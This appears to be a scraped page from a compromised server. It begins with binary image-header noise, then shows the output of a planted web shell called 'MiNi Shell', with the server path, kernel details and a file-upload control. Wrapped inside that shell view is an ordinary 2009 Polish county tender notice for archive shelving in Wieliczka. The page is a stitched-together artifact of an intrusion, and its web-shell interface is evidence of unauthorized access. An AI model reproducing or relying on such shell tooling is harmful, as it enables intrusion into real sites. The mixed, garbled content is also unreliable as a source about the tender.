JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090401/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090401/86240-N-2009.html

<p class="kh_header"><b>Wieliczka: Dostawa i montaż regałów archiwalnych</b><br>
<b>Numer ogłoszenia: 86240 - 2009; data zamieszczenia: 01.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Wielicki , ul. Dembowskiego 2, 32-020 Wieliczka, woj. małopolskie, tel. 012 2880210, faks 012 2880040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż regałów archiwalnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> a)Przedmiotem zamówienia jest dostawa wraz z montażem jezdnych i stałych regałów archiwalnych w czterech pomieszczeniach w budynku, zlokalizowanym przy ul. Daniłowicza 12 w Wieliczce.

Regały przeznaczone będą do magazynowania dokumentacji i księgozbiorów. 

Regały jezdne i stałe wykonane muszą być ze blachy, stalowej, jakościowej, walcowanej i tłoczonej na zimno. Elementy stalowe regałów muszą być fosforowane i malowane proszkowo farbą epoksydową lub mieszanką poliestrowo-epoksydową w kolorze RAL 7035 (jasny popiel), odporną na ścieranie i zadrapania, nieszkodliwą dla zdrowia i obojętna dla środowiska. Wszystkie elementy regałów (podstawy jezdne, profile ścian bocznych, paneli i pólek) muszą być pozbawione jakichkolwiek ostrych krawędzi i kantów. Regały posiadają zabezpieczenia przed ich przechyłem, a awaria któregoś z regału pozwala na używanie innych pozostałych w ciągu regałów.

Konstrukcja półki musi zabezpieczać zbiory przed przesuwaniem się i wzajemnym przenikaniem - wzdłuż tylniego brzegu półki ma znajdować się przegroda eliminująca to zjawisko. Dzielenia regału za pomocą stężeń krzyżowych wykonanych z płaskownika. Półki maja być zaczepione na zaczepach ( nie śrubowane) oraz demontowane bez użycia narzędzi. 
Nośność półki 50-120 kg.

Regały usztywnione są listwami stężającymi - krzyżakami. 

Cała konstrukcja regałów porusza się na szynach jezdnych, leżących na podłożu. Szyny jezdne posiadają obustronnie, w płaszczyźnie posadzki, najazdy, celem ułatwienia przejścia i przejazdu. Miedzy regałami powinny znajdować się odboje, umożliwiające, po całkowitym zsunięciu się regałów zmiażdżenie dłoni. Każdy regał musi posiadać blokadę, która zapobiega przypadkowemu zsunięciu się regałów, a odpowiednia konstrukcja regałów i torów zabezpieczy przed wywróceniem się regału w czasie jazdy.

Regały napędzane są napędem ręcznym korbowym. Przemieszczanie odbywa się za pomocą pokrętła trójramiennego. Ramiona pokrętła zakończone są gałkami. Z pokrętła za pomocą odpowiednich przekładni łańcuchowych napęd przenoszony jest na podwozie. W pokrętle (korbie), wbudowany jest zamek, umożliwiający zamknięcie regału bądź zablokowanie go w dowolnym miejscu. Zabezpiecza to przed samoczynnym przesunięciem regału w czasie jego obsługi. Siła potrzebna do przesuwu regału wynosi: od 2 do 5 kg 

Regały wyposażone są w dodatkową półkę kryjącą, która nie jest wliczona w powierzchnię użytkową regałów.

Na ścianie frontowej należy umieścić tabliczkę opisową.

Opisane regały muszą posiadać:
certyfikat bezpieczeństwa B /CE
Atest higieniczny.
Atest na niepalność.

b)Regały jezdne muszą być dostarczone do budynku przy ul. Daniłowicza 12 w Wieliczce oraz zamontowane, zgodnie ze wskazaniem Zamawiającego w niżej wymienionych pomieszczeniach:

Pomieszczenia 1, 2  - Parametry regałów: 
Długość użytkowa: 440 
Głębokość półki  2 x 30 cm 
Odstęp między półkami  34 cm 
Ilość półek: 7 +kryjąca 
Wysokość regałów  : 232 cm, 268 cm 
Kolor RAL 7035 / popiel 
Ilość mb :  800,80 (7 półek) 
Ilość sztuk: 13 sztuk

Pomieszczenia 3  - Parametry regałów: 
Długość użytkowa: 400, 560 
Głębokość półki  2 x 30 cm
Odstęp między półkami  34 cm 
Ilość półek:  6 + kryjąca, 5 + kryjąca (na długości 70 cm pod obniżeniem) 
Wysokość regałów  : 232 cm, 196cm 
Kolor RAL 7035 / popiel 
Ilość sztuk: regał przesuwny - 11 sztuk, 
regał stacjonarny  6 półkowy (wym. 560 cm/30cm) - 1 sztuka
Ilość mb łącznie ( stacjonarny+ jezdne) :  546,20 mb półki 

Pomieszczenie 4  - Parametry regałów: 
Długość użytkowa: 200 cm, 
Głębokość półki 2 x 30 cm 
Odstęp między półkami 34 cm 
Ilość półek: 6 + kryjąca 
Wysokość regałów 232 cm 
Kolor RAL 7035 / popiel 
Ilość sztuk: regał przesuwny - 6 sztuk,
Regał stacjonarny 6 półkowy (wym. 200cm/30cm) - 1 sztuka 
Ilość mb łącznie ( stacjonarny + jezdne) : 156 mb półki

Przed złożeniem oferty Wykonawca zobowiązany jest dokonać wizji lokalnej w pomieszczeniach przeznaczonych na archiwum zakładowe Starostwa Powiatowego w Wieliczce, zlokalizowanych w budynku przy ul. Daniłowicza 12 w Wieliczce celem zdobycia wszelkich niezbędnych informacji koniecznych do złożenia oferty.
Zobowiązuje się Wykonawcę do samodzielnego pomierzenia pomieszczeń, w których będą montowane regały oraz ich rozmieszczenia w poszczególnych pokojach. Termin wizji lokalnej należy uzgodnić telefonicznie z pracownikiem upoważnionym do kontaktów z Wykonawcami.

c)Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia własnym środkiem transportu i ponosi koszty dostawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych o udzielenie zamówienia mogą ubiegać się Wykonawcy , którzy :

a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
d)nie podlegają wykluczeniu z postępowania na podstawie art. 24 prawa zamówień publicznych

Ocena zostanie dokonana wg. formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty, wymienionych w pkt. 9 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Do oferty należy załączyć :
a)oświadczenie Wykonawcy, które stanowi załącznik  C do SIWZ - załącznik nr 1 do oferty,
b)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert, wskazujące osoby upoważnione do dokonywania czynności prawnych w imieniu Wykonawcy ( dotyczy każdego z wykonawców działających wspólnie ) - załącznik nr 2 do oferty, 
c)pełnomocnictwo, jeżeli Wykonawca jest reprezentowany w sposób inny, niż to wynika z zapisu we właściwym rejestrze lub w ewidencji działalności gospodarczej    ( zgodnie z art. 23 Pzp dotyczy także Wykonawców występujących wspólnie- tj. konsorcjum, S.C.) - załącznik nr 3 do oferty.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wieliczka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Wieliczce, ul. Dembowskiego 2, 32-020 Wieliczka, pok. Nr 14.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 08:45, miejsce: Starostwo Powiatowe w Wieliczce, ul. Dembowskiego 2, 32-020 Wieliczka, pok. Nr 12.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com